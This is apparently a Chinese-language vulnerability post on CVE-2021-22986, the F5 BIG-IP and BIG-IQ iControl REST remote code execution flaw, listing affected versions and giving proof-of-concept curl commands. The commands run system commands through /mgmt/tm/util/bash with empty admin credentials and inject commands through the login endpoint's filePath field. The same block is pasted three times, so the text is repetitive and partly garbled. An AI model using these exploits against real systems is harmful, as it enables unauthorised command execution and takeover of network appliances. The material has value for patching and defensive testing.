# CVE-2021-22986 F5 BIG-IP iControl RCE漏洞
*創建或刪除文件
*禁用服務
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 16.x 16.0.0 – 16.0.1 16.0.1.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 15.x 15.1.0 – 15.1.2 15.1.2.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 14.x 14.1.0 – 14.1.3 14.1.4 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 13.x 13.1.0 – 13.1.3 13.1.3.6 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 12.x 12.1.0 – 12.1.5 12.1.5.3* BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 11.x None Not applicable BIG-IQ Centralized Management 8.x None 8.0.0 BIG-IQ Centralized Management 7.x 7.1.0, 7.0.0 7.1.0.3, 7.0.0.2 BIG-IQ Centralized Management 6.x 6.0.0 – 6.1.0 None
==POC==
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
*執行任意系統命令
*創建或刪除文件
*禁用服務
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 16.x 16.0.0 – 16.0.1 16.0.1.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 15.x 15.1.0 – 15.1.2 15.1.2.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 14.x 14.1.0 – 14.1.3 14.1.4 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 13.x 13.1.0 – 13.1.3 13.1.3.6 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 12.x 12.1.0 – 12.1.5 12.1.5.3* BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 11.x None Not applicable BIG-IQ Centralized Management 8.x None 8.0.0 BIG-IQ Centralized Management 7.x 7.1.0, 7.0.0 7.1.0.3, 7.0.0.2 BIG-IQ Centralized Management 6.x 6.0.0 – 6.1.0 None
==POC==
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
*執行任意系統命令
*創建或刪除文件
*禁用服務
BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 16.x 16.0.0 – 16.0.1 16.0.1.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 15.x 15.1.0 – 15.1.2 15.1.2.1 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 14.x 14.1.0 – 14.1.3 14.1.4 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 13.x 13.1.0 – 13.1.3 13.1.3.6 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 12.x 12.1.0 – 12.1.5 12.1.5.3* BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO) 11.x None Not applicable BIG-IQ Centralized Management 8.x None 8.0.0 BIG-IQ Centralized Management 7.x 7.1.0, 7.0.0 7.1.0.3, 7.0.0.2 BIG-IQ Centralized Management 6.x 6.0.0 – 6.1.0 None
==POC==
1.
curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'
2.
curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'
3.
curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容